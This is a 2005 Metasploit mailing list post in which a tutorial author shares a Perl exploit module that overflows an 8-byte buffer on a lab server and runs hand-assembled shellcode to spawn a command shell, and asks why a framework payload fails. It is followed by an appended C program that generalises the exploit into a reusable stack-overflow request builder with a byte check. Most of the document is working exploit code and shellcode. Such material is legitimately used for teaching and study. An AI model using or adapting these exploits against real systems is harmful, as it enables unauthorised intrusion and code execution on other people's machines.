Metasploit mailing list archives
A small Windows problem
From: vmukhi at vsnl.com (Vijay Mukhi)
Date: Fri, 10 Jun 2005 17:12:41 +0530
I am writing a tutorial on MetaSploit at www.vijaymukhi.com. I have a tiny server listening on port 2000 at IP address 70.0.0.2. When I run the following exploit it overruns an 8-byte buffer on my server and opens a DOS box on the server. Being a teacher, I try to make my code as easy to understand as possible and hence have hard-coded the addresses; 0012ff8c is the address on the stack where my shellcode starts.

    package Msf::Exploit::z;
    use strict;
    use base "Msf::Exploit";
    use Msf::Socket::Tcp;

    my $info = {
        'Payload'       => { 'Space' => 1000 },
        'DefaultTarget' => 0,
        'Targets'       => [ ['Windows 2000 SP0-SP4'] ],
    };

    sub new {
        my $class = shift;
        my $self  = $class->SUPER::new({'Info' => $info});
        return $self;
    }

    sub Exploit {
        my $self      = shift;
        my $shellcode = $self->GetVar('EncodedPayload')->Payload;
        my $s = Msf::Socket::Tcp->new('PeerAddr' => '70.0.0.2', 'PeerPort' => 2000);

        # 12 bytes of filler overrun the 8-byte buffer, then the saved return
        # address is overwritten with 0x0012ff8c (little-endian: 8c ff 12 00),
        # the stack address where the shellcode below ends up.
        my $req = "AAAAAAAAAAAA" . "\x8c\xff\x12\x00" . "\x00\x00\x00\x00";

        # push ebp; mov ebp,esp; push ecx; mov dword [ebp-4],"cmd\0";
        # push 5; mov eax,ebp; sub eax,4
        $req .= "\x55\x8b\xec\x51\xc7\x45\xfc\x63\x6d\x64\x00\x6a\x05\x8b\xc5\x83\xe8\x04";
        # push eax; mov eax,0x7c4e9c1d; call eax;   (hard-coded address)
        # push 0;   mov eax,0x7c4ee01a; call eax    (hard-coded address)
        $req .= "\x50\xb8\x1d\x9c\x4e\x7c\xff\xd0\x6a\x00\xb8\x1a\xe0\x4e\x7c\xff\xd0";

        $s->Send($req);
    }

    1;

If I comment out the last two lines, I replace them with

    $req .= $shellcode;

and set the payload to win32_bin. When I now run the exploit I expect the system to open a DOS box on the machine that I am running my exploit on and connect it to the target machine. Nothing happens. What am I doing wrong? Any help or pointers would be highly appreciated.

Vijay Mukhi
Bombay
India
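The request in the message above is one instance of the classic stack-overflow layout: filler up to the saved return address, the return address in little-endian byte order, then the shellcode. The following C program is an added example, not code from the post or from Metasploit: it generalises that layout into a builder that takes the buffer size, return address and shellcode as parameters, reproduces the post's 55-byte request from the values given there (8-byte buffer, 0x0012ff8c, the four zero bytes, the 35 shellcode bytes), and checks the result byte for byte. The reading of the 12 filler bytes as "8-byte buffer plus 4 bytes of saved EBP", the `gap` parameter for the four zero bytes, and all function names are this example's own assumptions.

```c
/* Added example: generic stack-overflow request builder, checked against the
 * bytes posted to the list. Not part of the original message. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The 35 shellcode bytes from the post, verbatim. */
static const uint8_t kPostShellcode[] = {
    0x55,0x8b,0xec,0x51,0xc7,0x45,0xfc,0x63,0x6d,0x64,0x00,0x6a,0x05,0x8b,0xc5,0x83,0xe8,0x04,
    0x50,0xb8,0x1d,0x9c,0x4e,0x7c,0xff,0xd0,0x6a,0x00,0xb8,0x1a,0xe0,0x4e,0x7c,0xff,0xd0
};

/* Lay out a stack-overflow request:
 *   [buf_size + 4 filler bytes]  overrun the buffer and the saved EBP (assumption)
 *   [ret_addr, little-endian]    overwrite the saved return address
 *   [gap zero bytes]             what the post places between EIP and shellcode
 *   [shellcode]
 * Returns the request length, or 0 if it does not fit in out. */
size_t build_overflow(uint8_t *out, size_t out_cap, size_t buf_size,
                      uint32_t ret_addr, size_t gap,
                      const uint8_t *sc, size_t sc_len)
{
    size_t pad   = buf_size + 4;            /* 8-byte buffer -> 12 'A's */
    size_t total = pad + 4 + gap + sc_len;
    if (total > out_cap) return 0;

    memset(out, 'A', pad);
    out[pad + 0] = (uint8_t)(ret_addr);        /* x86 is little-endian:   */
    out[pad + 1] = (uint8_t)(ret_addr >> 8);   /* 0x0012ff8c is emitted   */
    out[pad + 2] = (uint8_t)(ret_addr >> 16);  /* as 8c ff 12 00          */
    out[pad + 3] = (uint8_t)(ret_addr >> 24);
    memset(out + pad + 4, 0, gap);
    memcpy(out + pad + 4 + gap, sc, sc_len);
    return total;
}

/* The post's request: 8-byte buffer, return address 0x0012ff8c, 4 zero bytes. */
size_t build_post_request(uint8_t *out, size_t out_cap)
{
    return build_overflow(out, out_cap, 8, 0x0012ff8cu, 4,
                          kPostShellcode, sizeof kPostShellcode);
}

/* Offset of the first occurrence of a byte the target's copy routine might
 * stop at or mangle (0x00 for a strcpy-style copy), or -1 if absent. */
long first_bad_byte(const uint8_t *p, size_t n, uint8_t bad)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == bad) return (long)i;
    return -1;
}

/* Self-check against the bytes in the post. Returns 0 if the generated
 * request matches, otherwise the number of the check that failed. */
int check_post_layout(void)
{
    uint8_t req[128];
    size_t n = build_post_request(req, sizeof req);
    if (n != 12 + 4 + 4 + sizeof kPostShellcode) return 1;     /* 55 bytes */
    for (size_t i = 0; i < 12; i++) if (req[i] != 'A') return 2;
    if (memcmp(req + 12, "\x8c\xff\x12\x00", 4) != 0) return 3;
    if (memcmp(req + 16, "\x00\x00\x00\x00", 4) != 0) return 4;
    if (memcmp(req + 20, kPostShellcode, sizeof kPostShellcode) != 0) return 5;
    /* The first 0x00 the target sees is the high byte of the return address,
     * so a copy that stops at NUL could never deliver this request. */
    if (first_bad_byte(req, n, 0x00) != 15) return 6;
    return 0;
}

int main(void)
{
    uint8_t req[256];
    size_t n = build_post_request(req, sizeof req);
    printf("request: %zu bytes, self-check %d\n", n, check_post_layout());
    for (size_t i = 0; i < n; i++)
        printf("%02x%s", req[i], (i % 16 == 15 || i + 1 == n) ? "\n" : " ");
    printf("first 0x00 at offset %ld\n", first_bad_byte(req, n, 0x00));
    return 0;
}
```

The NUL check is the caveat a practitioner would look at first when a hand-written request works but a framework payload does not: the return address 0x0012ff8c and the shellcode both contain zero bytes, so the request can only survive a length-based copy, and any payload that replaces the hand-written bytes is subject to the same constraint plus whatever size limit the server imposes on a single receive.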
Current thread:
- A small Windows problem Vijay Mukhi (Jun 10)
- A small Windows problem Jonatan B (Jun 10)